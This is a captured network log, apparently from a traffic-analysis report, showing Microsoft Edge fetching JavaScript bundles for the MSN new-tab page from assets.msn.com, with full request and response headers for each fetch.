user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: QbxUnehmyf041Y3h5oGD/A==
last-modified: Tue, 20 Dec 2022 05:42:21 GMT
etag: 0x8DAE24CF7090CBF
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: fef1a8cc-201e-00ee-535d-14baf2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:22 GMT
akamai-request-bc: [a=88.221.24.111,b=431585205,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b977b5
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/grocery-coupon-sd-card.fbaab90b6d413d517d48.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/grocery-coupon-sd-card.fbaab90b6d413d517d48.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: WwmK0o/z8Hv/omsUeq+e+Q==
last-modified: Tue, 20 Dec 2022 05:42:20 GMT
etag: 0x8DAE24CF6349DCA
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ac6d5a06-e01e-00ce-6d5a-142bc1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:22 GMT
akamai-request-bc: [a=88.221.24.111,b=431585649,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=18, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b97971
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/health-tip-wc.d88bdbe8e413481770e0.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/health-tip-wc.d88bdbe8e413481770e0.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: cVG/HkxDmg3XLTLmLqxYkw==
last-modified: Tue, 20 Dec 2022 05:42:19 GMT
etag: 0x8DAE24CF5E7736F
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 621f693a-901e-0001-085a-14269a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:22 GMT
akamai-request-bc: [a=88.221.24.111,b=431585796,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=18, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b97a04
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/healthFitnessCarousel.ff57e0a030983b51f924.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/healthFitnessCarousel.ff57e0a030983b51f924.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: W79I9Cfuq2PImbYEX1jRcQ==
last-modified: Tue, 20 Dec 2022 05:42:22 GMT
etag: 0x8DAE24CF76A0A4A
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2fe7baee-a01e-00f6-7c5b-1452c1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:22 GMT
akamai-request-bc: [a=88.221.24.111,b=431585994,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=30, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b97aca
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/holiday-effects.8b7b612e83fe57604987.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/holiday-effects.8b7b612e83fe57604987.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 6vN0//D4QGqc5RxCav18Uw==
last-modified: Tue, 20 Dec 2022 05:42:23 GMT
etag: 0x8DAE24CF7F127E9
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f3e05ea6-101e-00f5-145b-142fc7000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:23 GMT
akamai-request-bc: [a=88.221.24.111,b=431586129,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=21, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b97b51
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/horizontal-nav.eb7da7ce198b6ea7198e.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/horizontal-nav.eb7da7ce198b6ea7198e.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: YaJi6b2ZkGrsEdtrMJ6kIw==
last-modified: Fri, 16 Dec 2022 21:57:06 GMT
etag: 0x8DADFB07922CD57
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1576ef1d-601e-0052-11ee-1338af000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:23 GMT
akamai-request-bc: [a=88.221.24.111,b=431586297,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=31, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b97bf9
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/horoscope-answer-card-wc.b45461686e284b90d482.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/horoscope-answer-card-wc.b45461686e284b90d482.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: FqnlY+WMZ5BrC3uulA1gcA==
last-modified: Tue, 20 Dec 2022 05:42:19 GMT
etag: 0x8DAE24CF5A17400
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2fcee010-601e-0052-765c-1438af000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:23 GMT
akamai-request-bc: [a=88.221.24.111,b=431586370,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=25, clienttt; dur=1, origin; dur=0 , cdntime; dur=1
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b97c42
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/image-search-wc.37ae1445ec931d23d653.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/image-search-wc.37ae1445ec931d23d653.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: PPV+Y90su5w6c6LXSqXDkg==
last-modified: Tue, 20 Dec 2022 05:42:18 GMT
etag: 0x8DAE24CF55E0C3D
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2fcee169-601e-0052-4f5c-1438af000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:23 GMT
akamai-request-bc: [a=88.221.24.111,b=431586720,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b97da0
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/inline-head.3bf3117a7af2b27ce0a9.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/inline-head.3bf3117a7af2b27ce0a9.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: GMMwVjjntYULqA1ym6AQUw==
last-modified: Tue, 20 Dec 2022 05:42:18 GMT
etag: 0x8DAE24CF5611915
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ab8c62a5-401e-00c4-715a-1425d4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:23 GMT
akamai-request-bc: [a=88.221.24.111,b=431586964,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b97e94
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
Remote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/inline-head.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: I9vcuR5E6mxktI2UYeAY1g==
last-modified: Fri, 16 Dec 2022 21:57:07 GMT
etag: 0x8DADFB079B1D909
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ca51b9d3-e01e-009a-5e2d-13e4fa000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: gzip
date: Sat, 31 Dec 2022 00:06:23 GMT
content-length: 2163
akamai-request-bc: [a=88.221.24.111,b=431587168,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=18, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b97f60
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/inline-tuning-upsell.09b4a84cb8dc8b04f466.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/inline-tuning-upsell.09b4a84cb8dc8b04f466.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: krTtMTfHv4/ObO851W6dvA==
last-modified: Tue, 20 Dec 2022 05:42:23 GMT
etag: 0x8DAE24CF822DEFE
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ab8c64e1-401e-00c4-085a-1425d4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:23 GMT
akamai-request-bc: [a=88.221.24.111,b=431587292,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=24, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b97fdc
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/interest-management-card.cb9d3fcd355e3b7b779a.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/interest-management-card.cb9d3fcd355e3b7b779a.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: +V9EMg+K0Xsrgw5XW64QyQ==
last-modified: Fri, 16 Dec 2022 21:57:07 GMT
etag: 0x8DADFB079DA1BA0
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 12793a8f-501e-00a5-179a-114cf4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:23 GMT
akamai-request-bc: [a=88.221.24.111,b=431587480,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=33, clienttt; dur=2, origin; dur=0 , cdntime; dur=2
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b98098
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/interests-wc.f8e42bfc06c988caaa25.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/interests-wc.f8e42bfc06c988caaa25.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 8mTiZ0+YY9qRlwr9JhZ4vg==
last-modified: Tue, 20 Dec 2022 05:42:18 GMT
etag: 0x8DAE24CF547A158
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8529c30e-f01e-002b-0b5a-14b9bc000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:24 GMT
akamai-request-bc: [a=88.221.24.111,b=431587747,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=31, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b981a3
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/language-mismatch-banner.19818d06fb645ffc2a04.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/language-mismatch-banner.19818d06fb645ffc2a04.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: ZXjjQQZvZezLN3e1JDPmiA==
last-modified: Tue, 20 Dec 2022 05:42:21 GMT
etag: 0x8DAE24CF7393D6C
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3b6f9580-901e-0079-225a-148c8b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:24 GMT
akamai-request-bc: [a=88.221.24.111,b=431588372,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=26, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b98414
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/LanguageMismatchData.1deacf2a60938e450289.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/LanguageMismatchData.1deacf2a60938e450289.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: mddyj5KuBkTC2KMJJjvOMg==
last-modified: Fri, 16 Dec 2022 21:57:03 GMT
etag: 0x8DADFB0772AC98C
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: bc5a09f2-001e-00b8-2275-1323cd000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:24 GMT
akamai-request-bc: [a=88.221.24.111,b=431588501,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=24, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b98495
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/layoutPreferenceData.0fe44e79c268544b5336.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/layoutPreferenceData.0fe44e79c268544b5336.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: dYVpo46RuomrUWf6tKxOpA==
last-modified: Fri, 16 Dec 2022 21:57:10 GMT
etag: 0x8DADFB07B2D1DEF
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d6543b48-101e-005d-2976-13b1b0000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:24 GMT
akamai-request-bc: [a=88.221.24.111,b=431588635,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=32, clienttt; dur=1, origin; dur=0 , cdntime; dur=1
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9851b
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/libs_sports-data-service_dist_index_js-_75510.018c44447b9aa421f209.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/libs_sports-data-service_dist_index_js-_75510.018c44447b9aa421f209.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: dm0WVnkfg6uR/1wjw+G41Q==
last-modified: Tue, 20 Dec 2022 05:42:23 GMT
etag: 0x8DAE24CF83579E7
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 85263edc-f01e-002b-285a-14b9bc000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
